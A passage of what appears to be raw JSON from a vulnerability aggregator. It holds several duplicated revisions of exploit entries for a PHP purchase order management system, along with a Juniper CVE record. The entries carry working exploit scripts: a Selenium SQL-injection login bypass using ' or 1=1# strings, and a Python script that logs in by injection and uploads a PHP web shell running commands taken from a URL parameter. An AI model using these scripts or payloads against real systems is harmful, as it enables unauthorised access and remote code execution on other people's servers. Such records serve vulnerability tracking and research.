btn-primary\r\nbtn-block\\\"]').click()\")\r\n\r\nprint(Fore.RED + 'The payload for CVE-nu11-09 is deployed and your admin\r\naccount is PWNED by SQL - Injection\\n')\r\nprint(Fore.GREEN + 'Please see the screenshot poc.png to see if your\r\nexploit is working =) BR @nu11secur1ty\\n')\r\nprint(Style.RESET_ALL)\r\n\r\ntime.sleep(3)\r\nS = lambda X: driver.execute_script('return\r\ndocument.body.parentNode.scroll'+X)\r\n\r\ndriver.set_window_size(S('Width=1024'),S('Height=720')) # May need manual\r\nadjustment\r\ndriver.find_element_by_tag_name('body').screenshot('poc.png')\r\n\r\ndriver.quit()\r\n\r\nexcept Exception:\r\n#### This exception occurs if the element are not found in the webpage.\r\nprint(\"Some error occured :(\")\r\n\r\n\r\n------------------------------------------------------------------\r\n\r\n### Description:\r\nThe POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication for the admin account in app\r\n/purchase_order/classes/Login.php.\r\nremote SQL-Injection-Bypass-Authentication:\r\nhttps://portswigger.net/support/using-sql-injection-to-bypass-authentication.\r\n\r\nThe parameter (username) from the login form is not protected correctly and\r\nthere is no security and escaping from malicious payloads.\r\nWhen the user will sending a malicious query or malicious payload to the\r\nMySQL server, he can bypass the login credentials and take control of the\r\nadmin account.\n\n# 0day.today [2021-10-16] #"}, "lastseen": "2021-10-15T22:41:43", "differentElements": ["sourceData"], "edition": 35}, {"bulletin": {"id": "1337DAY-ID-36729", "hash": "b92378cfe6fd1ce2314d6d51a538ff2c", "type": "zdt", "bulletinFamily": "exploit", "title": "POMS-PHP 1.0 SQL Injection Exploit", "description": "", "published": "2021-09-10T00:00:00", "modified": "2021-09-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36729", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-10-16T22:38:54", "history": [], "viewCount": 41, "enchantments": {"dependencies": {"references": [], "modified": "2021-10-14T22:50:29", "rev": 2}, "score": {"value": 0.2, "vector": "NONE", "modified": "2021-10-14T22:50:29", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36729", "sourceData": "### Exploit Title: POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication.\r\n### Author: nu11secur1ty\r\n### Testing and Debugging: nu11secur1ty\r\n### Vendor: https://www.sourcecodester.com/user/257130/activity\r\n### Link:\r\nhttps://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#comment-form\r\n### CVE: CVE-nu11-09\r\n\r\n[+] Exploit Source:\r\n\r\n#!/usr/bin/python\r\n# Author @nu11secur1ty\r\nimport time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom colorama import init, Fore, Back, Style\r\ninit(convert=True)\r\n\r\n\r\noptions = webdriver.ChromeOptions()\r\noptions.headless = True\r\ndriver = webdriver.Chrome(options=options)\r\n\r\nPoC = 'http://localhost/purchase_order/admin/login.php'\r\n\r\ndriver.get(PoC)\r\n\r\n#enter your login username\r\nusername=\"nu11secur1ty' or 1=1#\"\r\n\r\n#enter your login password\r\npassword=\"nu11secur1ty' or 1=1#\"\r\n\r\n# test the exploit username\r\n#username=\"test\"\r\n\r\n# test the exploit password\r\n#password=\"blavsdfdfaaa\"\r\n\r\n#enter the element for username input field\r\nelement_for_username=\"username\"\r\n#enter the element for password input field\r\nelement_for_password=\"password\"\r\n\r\ntry:\r\n### 0\r\nusername_element = driver.find_element_by_name(element_for_username)\r\nusername_element.send_keys(username)\r\npassword_element = driver.find_element_by_name(element_for_password)\r\npassword_element.send_keys(password)\r\n\r\ntime.sleep(1)\r\ndriver.execute_script(\"document.querySelector('[class=\\\"btn btn-primary\r\nbtn-block\\\"]').click()\")\r\n\r\nprint(Fore.RED + 'The payload for CVE-nu11-09 is deployed and your admin\r\naccount is PWNED by SQL - Injection\\n')\r\nprint(Fore.GREEN + 'Please see the screenshot poc.png to see if your\r\nexploit is working =) BR @nu11secur1ty\\n')\r\nprint(Style.RESET_ALL)\r\n\r\ntime.sleep(3)\r\nS = lambda X: driver.execute_script('return\r\ndocument.body.parentNode.scroll'+X)\r\n\r\ndriver.set_window_size(S('Width=1024'),S('Height=720')) # May need manual\r\nadjustment\r\ndriver.find_element_by_tag_name('body').screenshot('poc.png')\r\n\r\ndriver.quit()\r\n\r\nexcept Exception:\r\n#### This exception occurs if the element are not found in the webpage.\r\nprint(\"Some error occured :(\")\r\n\r\n\r\n------------------------------------------------------------------\r\n\r\n### Description:\r\nThe POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication for the admin account in app\r\n/purchase_order/classes/Login.php.\r\nremote SQL-Injection-Bypass-Authentication:\r\nhttps://portswigger.net/support/using-sql-injection-to-bypass-authentication.\r\n\r\nThe parameter (username) from the login form is not protected correctly and\r\nthere is no security and escaping from malicious payloads.\r\nWhen the user will sending a malicious query or malicious payload to the\r\nMySQL server, he can bypass the login credentials and take control of the\r\nadmin account.\n\n# 0day.today [2021-10-17] #"}, "lastseen": "2021-10-16T22:38:54", "differentElements": ["sourceData"], "edition": 36}, {"bulletin": {"id": "1337DAY-ID-36729", "hash": "b11d33dc6228ad2d55fef490a6858649", "type": "zdt", "bulletinFamily": "exploit", "title": "POMS-PHP 1.0 SQL Injection Exploit", "description": "", "published": "2021-09-10T00:00:00", "modified": "2021-09-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36729", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-10-18T12:37:14", "history": [], "viewCount": 41, "enchantments": {"dependencies": {"references": [], "modified": "2021-10-14T22:50:29", "rev": 2}, "score": {"value": 0.2, "vector": "NONE", "modified": "2021-10-14T22:50:29", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36729", "sourceData": "### Exploit Title: POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication.\r\n### Author: nu11secur1ty\r\n### Testing and Debugging: nu11secur1ty\r\n### Vendor: https://www.sourcecodester.com/user/257130/activity\r\n### Link:\r\nhttps://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#comment-form\r\n### CVE: CVE-nu11-09\r\n\r\n[+] Exploit Source:\r\n\r\n#!/usr/bin/python\r\n# Author @nu11secur1ty\r\nimport time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom colorama import init, Fore, Back, Style\r\ninit(convert=True)\r\n\r\n\r\noptions = webdriver.ChromeOptions()\r\noptions.headless = True\r\ndriver = webdriver.Chrome(options=options)\r\n\r\nPoC = 'http://localhost/purchase_order/admin/login.php'\r\n\r\ndriver.get(PoC)\r\n\r\n#enter your login username\r\nusername=\"nu11secur1ty' or 1=1#\"\r\n\r\n#enter your login password\r\npassword=\"nu11secur1ty' or 1=1#\"\r\n\r\n# test the exploit username\r\n#username=\"test\"\r\n\r\n# test the exploit password\r\n#password=\"blavsdfdfaaa\"\r\n\r\n#enter the element for username input field\r\nelement_for_username=\"username\"\r\n#enter the element for password input field\r\nelement_for_password=\"password\"\r\n\r\ntry:\r\n### 0\r\nusername_element = driver.find_element_by_name(element_for_username)\r\nusername_element.send_keys(username)\r\npassword_element = driver.find_element_by_name(element_for_password)\r\npassword_element.send_keys(password)\r\n\r\ntime.sleep(1)\r\ndriver.execute_script(\"document.querySelector('[class=\\\"btn btn-primary\r\nbtn-block\\\"]').click()\")\r\n\r\nprint(Fore.RED + 'The payload for CVE-nu11-09 is deployed and your admin\r\naccount is PWNED by SQL - Injection\\n')\r\nprint(Fore.GREEN + 'Please see the screenshot poc.png to see if your\r\nexploit is working =) BR @nu11secur1ty\\n')\r\nprint(Style.RESET_ALL)\r\n\r\ntime.sleep(3)\r\nS = lambda X: driver.execute_script('return\r\ndocument.body.parentNode.scroll'+X)\r\n\r\ndriver.set_window_size(S('Width=1024'),S('Height=720')) # May need manual\r\nadjustment\r\ndriver.find_element_by_tag_name('body').screenshot('poc.png')\r\n\r\ndriver.quit()\r\n\r\nexcept Exception:\r\n#### This exception occurs if the element are not found in the webpage.\r\nprint(\"Some error occured :(\")\r\n\r\n\r\n------------------------------------------------------------------\r\n\r\n### Description:\r\nThe POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication for the admin account in app\r\n/purchase_order/classes/Login.php.\r\nremote SQL-Injection-Bypass-Authentication:\r\nhttps://portswigger.net/support/using-sql-injection-to-bypass-authentication.\r\n\r\nThe parameter (username) from the login form is not protected correctly and\r\nthere is no security and escaping from malicious payloads.\r\nWhen the user will sending a malicious query or malicious payload to the\r\nMySQL server, he can bypass the login credentials and take control of the\r\nadmin account.\n\n# 0day.today [2021-10-18] #"}, "lastseen": "2021-10-18T12:37:14", "differentElements": ["sourceData"], "edition": 37}], "viewCount": 41, "enchantments": {"dependencies": {"references": [], "modified": "2021-10-14T22:50:29", "rev": 2}, "score": {"value": 0.2, "vector": "NONE", "modified": "2021-10-14T22:50:29", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36729", "sourceData": "### Exploit Title: POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication.\r\n### Author: nu11secur1ty\r\n### Testing and Debugging: nu11secur1ty\r\n### Vendor: https://www.sourcecodester.com/user/257130/activity\r\n### Link:\r\nhttps://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#comment-form\r\n### CVE: CVE-nu11-09\r\n\r\n[+] Exploit Source:\r\n\r\n#!/usr/bin/python\r\n# Author @nu11secur1ty\r\nimport time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom colorama import init, Fore, Back, Style\r\ninit(convert=True)\r\n\r\n\r\noptions = webdriver.ChromeOptions()\r\noptions.headless = True\r\ndriver = webdriver.Chrome(options=options)\r\n\r\nPoC = 'http://localhost/purchase_order/admin/login.php'\r\n\r\ndriver.get(PoC)\r\n\r\n#enter your login username\r\nusername=\"nu11secur1ty' or 1=1#\"\r\n\r\n#enter your login password\r\npassword=\"nu11secur1ty' or 1=1#\"\r\n\r\n# test the exploit username\r\n#username=\"test\"\r\n\r\n# test the exploit password\r\n#password=\"blavsdfdfaaa\"\r\n\r\n#enter the element for username input field\r\nelement_for_username=\"username\"\r\n#enter the element for password input field\r\nelement_for_password=\"password\"\r\n\r\ntry:\r\n### 0\r\nusername_element = driver.find_element_by_name(element_for_username)\r\nusername_element.send_keys(username)\r\npassword_element = driver.find_element_by_name(element_for_password)\r\npassword_element.send_keys(password)\r\n\r\ntime.sleep(1)\r\ndriver.execute_script(\"document.querySelector('[class=\\\"btn btn-primary\r\nbtn-block\\\"]').click()\")\r\n\r\nprint(Fore.RED + 'The payload for CVE-nu11-09 is deployed and your admin\r\naccount is PWNED by SQL - Injection\\n')\r\nprint(Fore.GREEN + 'Please see the screenshot poc.png to see if your\r\nexploit is working =) BR @nu11secur1ty\\n')\r\nprint(Style.RESET_ALL)\r\n\r\ntime.sleep(3)\r\nS = lambda X: driver.execute_script('return\r\ndocument.body.parentNode.scroll'+X)\r\n\r\ndriver.set_window_size(S('Width=1024'),S('Height=720')) # May need manual\r\nadjustment\r\ndriver.find_element_by_tag_name('body').screenshot('poc.png')\r\n\r\ndriver.quit()\r\n\r\nexcept Exception:\r\n#### This exception occurs if the element are not found in the webpage.\r\nprint(\"Some error occured :(\")\r\n\r\n\r\n------------------------------------------------------------------\r\n\r\n### Description:\r\nThe POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication for the admin account in app\r\n/purchase_order/classes/Login.php.\r\nremote SQL-Injection-Bypass-Authentication:\r\nhttps://portswigger.net/support/using-sql-injection-to-bypass-authentication.\r\n\r\nThe parameter (username) from the login form is not protected correctly and\r\nthere is no security and escaping from malicious payloads.\r\nWhen the user will sending a malicious query or malicious payload to the\r\nMySQL server, he can bypass the login credentials and take control of the\r\nadmin account.\n\n# 0day.today [2021-10-19] #", "_object_type": "robots.models.zdt.ZDTBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.zdt.ZDTBulletin"]}], "exploitdb": [{"id": "EDB-ID:50292", "hash": "e6062cb4064dad9e2015c1705cc6f7c2", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Purchase Order Management System 1.0 - Remote File Upload", "description": "", "published": "2021-09-14T00:00:00", "modified": "2021-09-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/50292", "reporter": "Exploit-DB", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-09-14T09:19:18", "history": [], "viewCount": 137, "enchantments": {"dependencies": {"references": [], "modified": "2021-09-14T09:19:18", "rev": 2}, "score": {"value": -0.2, "vector": "NONE", "modified": "2021-09-14T09:19:18", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://www.exploit-db.com/download/50292", "sourceData": "# Exploit Title: Purchase Order Management System 1.0 - Remote File Upload\r\n# Date: 2021-09-14 \r\n# Exploit Author: Aryan Chehreghani\r\n# Vendor Homepage: https://www.sourcecodester.com\r\n# Software Link: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html\r\n# Version: v1.0\r\n# Tested on: Windows 10 - XAMPP Server \r\n\r\n# [ About the Purchase Order Management System ] :\r\n#This Purchase Order Management System can store the list of all company's,\r\n#suppliers for easily retrieving the suppliers' data upon generating the purchase order.\r\n#It also stores the list of Items that the company possibly purchased from their suppliers.\r\n#Both the mentioned features have CRUD (Create, Read, Update, and Delete) operations. \r\n#Talking about generating the Purchase Order, the system can generate a printable Purchase Order Slip/Request.\r\n\r\n#!/bin/env python3\r\nimport requests\r\nimport time\r\nimport sys\r\nfrom colorama import Fore, Style\r\nif len(sys.argv) !=2:\r\n print ('''\r\n########################################################### \r\n#Purchase Order Management System 1.0 - Remote File Upload#\r\n# BY:Aryan Chehreghani #\r\n# Team:TAPESH DIGITAL SECURITY TEAM IRAN #\r\n# mail:aryanchehreghani@yahoo.com\t # \r\n# -+-USE:python script.py <target url> # \r\n# [+]Example:python3 script.py http://127.0.0.1/ #\r\n###########################################################\r\n''')\r\nelse:\r\n try:\r\n url = sys.argv[1]\r\n print()\r\n print('[*] Trying to login...')\r\n time.sleep(1)\r\n login = url + '/classes/Login.php?f=login'\r\n payload_name = \"shell.php\"\r\n payload_file = r\"\"\"<?php @system($_GET['tapesh']); ?>\"\"\"\r\n session = requests.session()\r\n post_data = {\"username\": \"'=''or'\", \"password\": \"'=''or'\"}\r\n user_login = session.post(login, data=post_data)\r\n cookie = session.cookies.get_dict()\r\n\r\n if user_login.text == '{\"status\":\"success\"}':\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!')\r\n upload_url = url + \"/classes/Users.php?f=save\"\r\n cookies = cookie\r\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"X-Requested-With\": \"XMLHttpRequest\", \"Content-Type\": \"multipart/form-data; boundary=---------------------------221231088029122460852571642112\", \"Origin\": \"http://localhost\", \"Connection\": \"close\", \"Referer\": \"http://localhost/leave_system/admin/?page=user\"}\r\n data = \"-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"id\\\"\\r\\n\\r\\n1\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"firstname\\\"\\r\\n\\r\\nAdminstrator\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"lastname\\\"\\r\\n\\r\\nAdmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"username\\\"\\r\\n\\r\\nadmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"password\\\"\\r\\n\\r\\n\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"img\\\"; filename=\\\"\" + payload_name +\"\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n\\n \" + payload_file + \"\\n\\n\\r\\n-----------------------------221231088029122460852571642112--\\r\\n\"\r\n print('[*] Trying to shell...')\r\n time.sleep(2)\r\n\r\n try:\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Shell Uploaded!')\r\n upload = session.post(upload_url, headers=headers, cookies=cookie, data=data)\r\n upload_check = f'{url}/uploads'\r\n r = requests.get(upload_check)\r\n if payload_name in r.text:\r\n \r\n payloads = r.text.split('<a href=\"')\r\n for load in payloads:\r\n\r\n if payload_name in load:\r\n payload = load.split('\"')\r\n payload = payload[0]\r\n else:\r\n pass\r\n else:\r\n exit()\r\n\r\n except:\r\n print (\"Upload failed try again\\n\")\r\n exit()\r\n\r\n try:\r\n print(\"Check Your Target ;)\\n\")\r\n\r\n\r\n except:\r\n print(\"Failed to find shell\\n\")\r\n \r\n else:\r\n print(\"Login failed!\\n\")\r\n\r\n except:\r\n print(\"Something Went Wrong!\\n\")\r\n \r\n#########################################################\r\n#FILE LOCATION : http://localhost/purchase_order/uploads/1631583540_shell.php?tapesh=dir", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.exploitdb.ExploitDbBulletin"]}], "cve": [{"id": "CVE-2021-0292", "bulletinFamily": "NVD", "title": "CVE-2021-0292", "description": "An Uncontrolled Resource Consumption vulnerability in the ARP daemon (arpd) and Network Discovery Protocol (ndp) process of Juniper Networks Junos OS Evolved allows a malicious attacker on the local network to consume memory resources, ultimately resulting in a Denial of Service (DoS) condition. Link-layer functions such as IPv4 and/or IPv6 address resolution may be impacted, leading to traffic loss. The processes do not recover on their own and must be manually restarted. Changes in memory usage can be monitored using the following shell commands (header shown for clarity): user@router:/var/log# ps aux | grep arpd USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 31418 59.0 0.7 *5702564* 247952 ? xxx /usr/sbin/arpd --app-name arpd -I object_select --shared-objects-mode 3 user@router:/var/log# ps aux | grep arpd USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 31418 49.1 1.0 *5813156* 351184 ? xxx /usr/sbin/arpd --app-name arpd -I object_select --shared-objects-mode 3 Memory usage can be monitored for the ndp process in a similar fashion: user@router:/var/log# ps aux | grep ndp USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 14935 0.0 0.1 *5614052* 27256 ? Ssl Jun15 0:17 /usr/sbin/ndp -I no_tab_chk,object_select --app-name ndp --shared-obje user@router:/var/log# ps aux | grep ndp USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 14935 0.0 0.1 *5725164* 27256 ? Ssl Jun15 0:17 /usr/sbin/ndp -I no_tab_chk,object_select --app-name ndp --shared-obje This issue affects Juniper Networks Junos OS Evolved: 19.4 versions prior to 19.4R2-S3-EVO; 20.1 versions prior to 20.1R2-S4-EVO; all versions of 20.2-EVO. This issue does not affect Juniper Networks Junos OS Evolved versions prior to 19.4R2-EVO.", "published": "2021-07-15T20:15:00", "modified": "2021-07-29T15:30:00", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-0292", "reporter": "sirt@juniper.net", "references": ["https://kb.juniper.net/JSA11194"], "cvelist": ["CVE-2021-0292"], "immutableFields": [], "type": "cve", "lastseen": "2021-07-30T07:40:12", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "cvelist": ["CVE-2021-0292"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "An Uncontrolled Resource Consumption vulnerability in the ARP daemon (arpd) and Network Discovery Protocol (ndp) process of Juniper Networks Junos OS Evolved allows a malicious attacker on the local network to consume memory resources, ultimately resulting in a Denial of Service (DoS) condition. Link-layer functions such as IPv4 and/or IPv6 address resolution may be impacted, leading to traffic loss. The processes do not recover on their own and must be manually restarted. Changes in memory usage can be monitored using the following shell commands (header shown for clarity): user@router:/var/log# ps aux | grep arpd USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 31418 59.0 0.7 *5702564* 247952 ? xxx /usr/sbin/arpd --app-name arpd -I object_select --shared-objects-mode 3 user@router:/var/log# ps aux | grep arpd USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 31418 49.1 1.0 *5813156* 351184 ? xxx /usr/sbin/arpd --app-name arpd -I object_select --shared-objects-mode 3 Memory usage can be monitored for the ndp process in a similar fashion: user@router:/var/log# ps aux | grep ndp USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 14935 0.0 0.1 *5614052* 27256 ? Ssl Jun15 0:17 /usr/sbin/ndp -I no_tab_chk,object_select --app-name ndp --shared-obje user@router:/var/log# ps aux | grep ndp USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 14935 0.0 0.1 *5725164* 27256 ? Ssl Jun15 0:17 /usr/sbin/ndp -I no_tab_chk,object_select --app-name ndp --shared-obje This issue affects Juniper Networks Junos OS Evolved: 19.4 versions prior to 19.4R2-S3-EVO; 20.1 versions prior to 20.1R2-S4-EVO; all versions of 20.2-EVO. This issue does not affect Juniper Networks Junos OS Evolved versions prior to 19.4R2-EVO.", "edition": 2, "enchantments": {"dependencies": {"modified": "2021-07-16T07:48:17", "references": [{"idList": ["JUNIPER_JSA11194.NASL"], "type": "nessus"}], "rev": 2}, "score": {"modified": "2021-07-16T07:48:17", "rev": 2, "value": 1.4, "vector": "NONE"}, "twitter": {"counter": 4, "modified": "2021-07-28T14:21:04", "tweets": [{"link": "https://twitter.com/WolfgangSesin/status/1420788815996796934", "text": "New post from https://t.co/uXvPWJy6tj?amp=1 (CVE-2021-0292 (junos_evolved)) has been published on https://t.co/lmpXQ0hMNx?amp=1"}, {"link": "https://twitter.com/WolfgangSesin/status/1420788815996796934", "text": "New post from https://t.co/uXvPWJy6tj?amp=1 (CVE-2021-0292 (junos_evolved)) has been published on https://t.co/lmpXQ0hMNx?amp=1"}, {"link": "https://twitter.com/www_sesin_at/status/1420788881138536449", "text": "New post from https://t.co/9KYxtdZjkl?amp=1 (CVE-2021-0292 (junos_evolved)) has been published on https://t.co/9ag6nytbpS?amp=1"}, {"link": "https://twitter.com/www_sesin_at/status/1420788881138536449", "text": "New post from https://t.co/9KYxtdZjkl?amp=1 (CVE-2021-0292 (junos_evolved)) has been published on https://t.co/9ag6nytbpS?amp=1"}]}}, "extraReferences": [{"name": "https://kb.juniper.net/JSA11194", "refsource": "CONFIRM", "tags": [], "url": "https://kb.juniper.net/JSA11194"}], "hash": "1a75b8206b74dcadb07dbc9344e4b8d7404e6aa03ee82e2093b26a78eef53148", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "ae93511931d905bc8db96ac6ae2a0ea6", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "4431ee369bdb0e469caf9f1ca35839cf", "key": "published"}, {"hash": "d80aefa28b0e9b9743c74b29d6da8565", "key": "modified"}, {"hash": "821eea281a2815c3064633ed4b9795cd", "key": "title"}, {"hash": "1c73951065cb084f6f8063da2a01d272", "key": "description"}, {"hash": "c5d35413584029bc401c1212340541c3", "key": "extraReferences"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "9405a9560dcaac9e91cb939f52b257ca", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "02ed1e0f56921c8e43e32491f72c14ea", "key": "reporter"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "81342635da437da3b0897e10f103e0d6", "key": "cpeConfiguration"}, {"hash": "fc8c24dea87350db8ab64bd92dbf2a19", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-0292", "id": "CVE-2021-0292", "immutableFields": [], "lastseen": "2021-07-28T14:21:04", "modified": "2021-07-15T21:15:00", "objectVersion": "1.6", "published": "2021-07-15T20:15:00", "references": ["https://kb.juniper.net/JSA11194"], "reporter": "sirt@juniper.net", "title": "CVE-2021-0292", "type": "cve", "viewCount": 17}, "different_elements": ["extraReferences", "cpe23", "cvss", "modified", "cpe", "cwe", "affectedSoftware", "cpeConfiguration"], "edition": 2, "lastseen": "2021-07-28T14:21:04"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "cvelist": ["CVE-2021-0292"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, "cwe": [], "description": "An Uncontrolled Resource Consumption vulnerability in the ARP daemon (arpd) and Network Discovery Protocol (ndp) process of Juniper Networks Junos OS Evolved allows a malicious attacker on the local network to consume memory resources, ultimately resulting in a Denial of Service (DoS) condition. Link-layer functions such as IPv4 and/or IPv6 address resolution may be impacted, leading to traffic loss. The processes do not recover on their own and must be manually restarted. Changes in memory usage can be monitored using the following shell commands (header shown for clarity): user@router:/var/log# ps aux | grep arpd USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 31418 59.0 0.7 *5702564* 247952 ? xxx /usr/sbin/arpd --app-name arpd -I object_select --shared-objects-mode 3 user@router:/var/log# ps aux | grep arpd USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 31418 49.1 1.0 *5813156* 351184 ? xxx /usr/sbin/arpd --app-name arpd -I object_select --shared-objects-mode 3 Memory usage can be monitored for the ndp process in a similar fashion: user@router:/var/log# ps aux | grep ndp USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 14935 0.0 0.1 *5614052* 27256 ? Ssl Jun15 0:17 /usr/sbin/ndp -I no_tab_chk,object_select --app-name ndp --shared-obje user@router:/var/log# ps aux | grep ndp USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 14935 0.0 0.1 *5725164* 27256 ? Ssl Jun15 0:17 /usr/sbin/ndp -I no_tab_chk,object_select --app-name ndp --shared-obje This issue affects Juniper Networks Junos OS Evolved: 19.4 versions prior to 19.4R2-S3-EVO; 20.1 versions prior to 20.1R2-S4-EVO; all versions of 20.2-EVO. This issue does not affect Juniper Networks Junos OS Evolved versions prior to 19.4R2-EVO.", "edition": 1, "enchantments": {"dependencies": {"modified": "2021-07-16T07:48:17", "references": [{"idList": ["JUNIPER_JSA11194.NASL"], "type": "nessus"}], "rev": 2}, "score": {"modified": "2021-07-16T07:48:17", "rev": 2, "value": 1.4, "vector": "NONE"}}, "extraReferences": [{"name": "https://kb.juniper.net/JSA11194", "refsource": "CONFIRM", "tags": [], "url": "https://kb.juniper.net/JSA11194"}], "hash": "e5a81aee9fd432d2073d5c3c07eb0958ad586b13b8533a300905a2dff930ba9b", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "ae93511931d905bc8db96ac6ae2a0ea6", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "4431ee369bdb0e469caf9f1ca35839cf", "key": "published"}, {"hash": "d80aefa28b0e9b9743c74b29d6da8565", "key": "modified"}, {"hash": "c661bddcfaacfd849336438f1fee2f59", "key": "cvss3"}, {"hash": "821eea281a2815c3064633ed4b9795cd", "key": "title"}, {"hash": "1c73951065cb084f6f8063da2a01d272", "key": "description"}, {"hash": "c5d35413584029bc401c1212340541c3", "key": "extraReferences"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "9405a9560dcaac9e91cb939f52b257ca", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": 